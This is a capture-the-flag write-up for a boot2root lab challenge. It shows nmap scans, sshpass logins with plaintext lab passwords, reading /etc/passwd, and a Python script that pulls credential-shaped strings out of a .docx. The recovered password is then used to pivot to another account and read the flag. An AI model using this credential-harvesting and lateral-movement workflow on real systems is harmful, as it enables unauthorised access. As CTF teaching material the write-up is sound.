N
Back to writeup archive
LIGA CTF 2026 (Week 2 Boot2Root)

Spray and Pray - II

Pivot from the abel foothold (Part I) to niki and read local2.txt. Credentials are hidden inside a .docx in abel's Documents.

Boot2RootMarkdown + PDFEasysolved1 minread·203words
route
/TryN3rr0r/writeups/liga-ctf-2026-week-2-boot2root/spray-and-pray-ii
archive index
3 / 16
read mode
parsed markdown
Writeup loaded.

Spray and Pray - II

challenge brief
target profile, scoring, and execution stack
verified solve
target
192.168.1.20
category
Boot2Root
points
467
difficulty
Medium
flag format
OWASPKL{xxx}
tools used
nmapsshsshpasspython3zipfile
final flag
OWASPKL{d73aa3d24c1fb6ce993a38efe5505369}
reveal and copy from section 5
PDF evidence frame 01

1. Challenge Overview

Pivot from the abel foothold (Part I) to niki and read local2.txt. Credentials are hidden inside a .docx in abel's Documents.

2. Initial Reconnaissance

2.1 Confirm service + enumerate users

bash2 lines
1nmap -sC -sV -p- -T4 192.168.1.20 -oA spray2_nmap_full2sshpass -p 'angel1' ssh -o StrictHostKeyChecking=no abel@192.168.1.20 "id; grep ':/bin/bash' /etc/passwd"
bash5 lines
122/tcp open  ssh  OpenSSH 10.2p1 Ubuntu 2ubuntu3.22uid=1006(abel) gid=1006(abel) groups=1006(abel)3spraynpray:x:1000:1000:...:/bin/bash4niki:x:1004:1004::/home/niki:/bin/bash5abel:x:1006:1006::/home/abel:/bin/bash
PDF evidence frame 02

3. Analysis / Forensics Path

3.1 Locate the credential document

bash1 lines
1sshpass -p 'angel1' ssh -o StrictHostKeyChecking=no abel@192.168.1.20 "ls -la /home/abel/Documents"
bash1 lines
1-rw-rw-r-- 1 niki niki 16335 May 23 19:34 Minit_Mesyuarat_2026_Password_Guideline.docx

3.2 Extract candidate creds from the .docx

A .docx is a zip; I parsed word/document.xml and filtered for hashes / password-shaped tokens (pattern-based, not hardcoded).

bash8 lines
1cat <<'PY' | sshpass -p 'angel1' ssh -o StrictHostKeyChecking=no abel@192.168.1.20 'python3 -'2import zipfile,re3p='/home/abel/Documents/Minit_Mesyuarat_2026_Password_Guideline.docx'4s=zipfile.ZipFile(p).read('word/document.xml').decode('utf-8','ignore')5for t in sorted(set(re.findall(r"[A-Za-z0-9_@!]{8,}", s))):6    if re.fullmatch(r"[A-Fa-f0-9]{32}", t) or (any(c.isdigit() for c in t) and ('@' in t or '_' in t or 'Password' in t)):7        print(t)8PY
bash4 lines
1C5c56879cbb62d314bf76582c78bcfb72Password1233abel_0411@weekndbuk1tj4lil4niki_ily3000@2019

4. Exploitation / Recovery

4.1 Pivot to niki, hunt the flag, then read it

bash1 lines
1sshpass -p 'abel_0411@weekndbuk1tj4lil' ssh -o StrictHostKeyChecking=no niki@192.168.1.20 "id; grep -Rns 'OWASPKL{' /home/niki 2>/dev/null; ls -la /home/niki/Desktop/local2.txt; cat /home/niki/Desktop/local2.txt"
bash4 lines
1uid=1004(niki) gid=1004(niki) groups=1004(niki)2/home/niki/Desktop/local2.txt:1:OWASPKL{d73aa3d24c1fb6ce993a38efe5505369}3-rw-rw-r-- 1 niki niki 42 May 23 20:14 /home/niki/Desktop/local2.txt4OWASPKL{d73aa3d24c1fb6ce993a38efe5505369}

> Re-validated live on 2026-05-31 via Kali (192.168.1.10): niki:abel_0411@weekndbuk1tj4lil logged in and returned the flag above.

PDF evidence frame 03

5. Flag

captured flag
OWASPKL{d73aa3d24c1fb6ce993a38efe5505369}

6. Summary of Approach & Key Takeaways

Logged in as abel, enumerated /etc/passwd users.

Found a password-guideline .docx in abel's Documents.

Parsed word/document.xml for credential-shaped tokens.

Pivoted to niki with abel_0411@weekndbuk1tj4lil.

Read /home/niki/Desktop/local2.txt.

Office docs are zip archives; grep word/document.xml for leaked secrets.

Pattern-based extraction avoids guessing which token is the password.

PDF evidence frame 04
PDF evidence frame 05
PDF evidence frame 06